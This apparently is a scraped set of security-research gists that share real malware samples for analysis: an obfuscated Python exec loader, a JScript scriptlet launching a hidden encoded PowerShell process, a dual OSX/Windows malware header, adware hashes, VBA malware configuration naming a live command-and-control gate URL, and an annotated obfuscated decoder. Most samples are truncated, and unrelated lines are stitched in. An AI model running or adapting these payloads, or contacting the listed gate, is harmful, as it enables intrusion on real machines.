@seclib
seclib / 4d8e4c3902f46d941e5ae9d914126b
Created November 13, 2018 00:53
Python obfuscated sample
## Uploaded by @satya_enki
exec("import re;import base64");exec((lambda p,y:(lambda o,b,f:re.sub(o,b,f))(r"([0-9a-f]+)",lambda m:p(m,y),base64.b64decode("
@seclib
seclib / vbscript
Created November 27, 2018 06:21
a killer feature of @gchq CyberChef
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcA
Dependencies
To view the visualizations below, you may need to install holoviews:
!pip install holoviews
!pip install --upgrade bokeh
When your app is registered to call the WDATP APIs you need to pass the credentials in to this sample.
@seclib
seclib / OSX Windows malware
Created January 4, 2019 18:37
All you need to analyze this dual OSX/Windows malware is a base64 decode utility and some #Python knowledge
#!/usr/bin/python
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
import binascii
import code
import os
import platform
import random
import re
import select
import socket
@seclib
seclib / PowerShell example payloads on VT
Created January 4, 2019 18:40
Here are other hashes that the rule finds
## PowerShell example payloads on VT
@seclib
seclib / adware
Last active January 4, 2019 18:47
It injects into Chrome, uses Google analytics for tracking, calls native Windows and COM APIs, and uses a scheduled task for persistence. Python sources and hashes
## uploaded by @satya_enki
## sample hashes: 23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476, 9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7
## links:
## https://www.reverse.it/sample/23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476?environmentId=100
## https://www.reverse.it/sample/9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7?environmentId=100
## Also mentioned here: http://www.programmersforum.ru/showthread.php?t=310934
## https://forums.malwarebytes.com/topic/200388-removal-instructions-for-fast-approach-tt/
## contents of app.py (49e766121a201104f05d3ebb5fdd9e8f337615c9d3a6177bd83539da8405ecbd):
@seclib
seclib / e6f5r65t9n87r9u7yr87u
Created February 5, 2019 12:25
VBA DOC Malware MSBuild Scheduled Task
## Uploaded by @satya_enki
## Sample evolution:
olevba3 0.53.1 - http://decalage.info/python/oletools
var BV = "6.0";
var Gate = "https://tonsandmillions.com/sendanalytics-28529/info";
var hit_each = 1;
var error_retry = 2;
var restart_h = 4;
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
var Rkey = "ZkY3egXBulkogSbGEHqA";
var rcon_now = 0;
var gtfo = false;
var selfdel = false;
@seclib
seclib / Scriptlet Decoded
Created March 5, 2019 09:59
Scriptlet Decoded
<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
<registration
progid="obLrn.U3rY5s"
classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
<script language="JScript" >
// Reverses a string (used to undo a reversed-string layer of the obfuscation)
function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}
// Assembles the name "fromCharCode" from fragments and calls String.fromCharCode(kJYu)
function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}
// Maps one base64 character to its 6-bit value; vm27C7HmF (the alphabet string) is defined elsewhere in the scriptlet and not shown in this preview
function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}
// Custom base64 decoder, processing the input four characters at a time (truncated in the gist preview)
function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHARy;var sDBrnzbZ4I = "";for(vpq8QW3uBI = 0;vpq8QW3uBI<fIImISnUlb.length-3;vpq8QW3uBI += 4){mRIs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+0));xYYT7RMqs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+1));hQtefhUl=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+2));tgHARy=xP0